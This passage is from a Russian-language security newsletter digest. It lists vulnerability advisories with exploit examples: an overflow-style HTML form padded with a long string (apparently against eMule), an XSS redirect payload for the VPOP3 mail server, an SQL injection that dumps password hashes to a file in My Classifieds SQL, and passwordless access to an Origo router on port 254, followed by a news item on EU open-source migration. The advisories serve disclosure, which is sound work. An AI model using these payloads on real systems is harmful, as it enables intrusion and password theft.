aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa">
<input type="hidden" name=w value="password">
<br><br><input type=submit value="Login Now"></font>
</form>

URL производителя:http://www.emule-project.net/

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

16

Межсайтовый скриптинг в PSCS VPOP3 Email Server

23 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: PSCS VPOP3 Email Server 2.x

Опасность: Низкая

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в VPOP3. Злонамеренный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

index.html?redirect=admin/index.html";%0Devil_script;%0D//

URL производителя:http://www.pscs.co.uk/

Решение:Установите обновленную версию программы: http://www.pscs.co.uk/downloads/vpop3.html

17

SQL инъекция в My Classifieds SQL

23 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: My Classifieds SQL 2.13

Опасность: Средняя

Наличие эксплоита: Да

Описание: Уязвимость обнаружена в My Classifieds SQL. Злонамеренный пользователь может выполнить нападение SQL инъекции.

Уязвимость связанна с ошибкой проверки правильности данных, представленных в переменной "$email". В результате злонамеренный пользователь может манипулировать существующим SQL запросом и раскрыть потенциально чувствительные данные, типа паролей пользователей системы.

Пример/Эксплоит:

If the value of $email is aaa@aaa.com' OR 1=1 INTO OUTFILE
'/<directory-path>/pass.txt, the SQL request becomes:

select passmd5 from people where email=' aaa@aaa.com' OR 1=1 INTO OUTFILE
'/<directory-path>/pass.txt'

URL производителя:http://fuzzymonkey.org

Решение: Установите обновленную версию программы: http://fuzzymonkey.org/newfuzzy/software/perl/

18

Неавторизованный доступ к Origo ASR-8100 ADSL маршрутизатору

23 октября | Рубрика: Дыры и патчи программ и операционных сред

Программа: Origo ASR-8100 ADSL Router Firmware ETHADSL_USB_110502_REL10_S; Customer Software Version 110502_REL10_S; Version 3.21

Опасность: Критическая

Наличие эксплоита: Не требуется

Описание: Уязвимость обнаружена в маршрутизаторах Origo ASR-8100 ADSL маршрутизатору. Удаленный пользователь может получить неавторизованный доступ к устройству.

Удаленный пользователь может подключиться у WAN интерфейсу на 254 порту устройства, чтобы получить доступ к конфигурационному интерфейсу без пароля. В результате удаленный пользователь может неавторизованно изменять конфигурацию устройства.

URL производителя: http://www.origo2000.com/product/product.php?PAGE=asr-8000

Решение: Ограничьте доступ к 254 порту только для доверенных IP адресов.

19

Страны ЕС задумались,как избавиться от Windows

23 октября | Рубрика: Технологии безопасности. Организации разработчики, интеграторы.

Административные органы Евросоюза рапространили среди правительств стран-его участников своеобразные руководства: как перейти на программное обеспечение с открытыми исходными кодами.

Основная борьба идет между операционными системами - ведь именно они определяют набор прочих используемых программ. В одном углу ринга Windows и могущественная корпорация Microsoft, в другом - все модификации ОС Linux и их многочисленные разработчики.

Стив Баллмер, исполнительный директор Microsoft, утверждает, что выбор Linux станет ошибкой. Безопасность этой операционной системы, по его мнению, оставляет желать лучшего. Большой вопрос! Ведь именно Windows столь часто критикуется за многочисленные "дыры". С другой стороны, огромное количество вирусов для этой ОС обусловлено именно её популярностью. Что же касается Linux, то для большинства вирусописателей это своеобразный "неуловимый Джо": он мало кому нужен, поэтому его мало кто ловит.

20




Эти и другие новости читайте на сайте Стра.тег



http://subscribe.ru/
E-mail: ask@subscribe.ru
Отписаться
Убрать рекламу

В избранное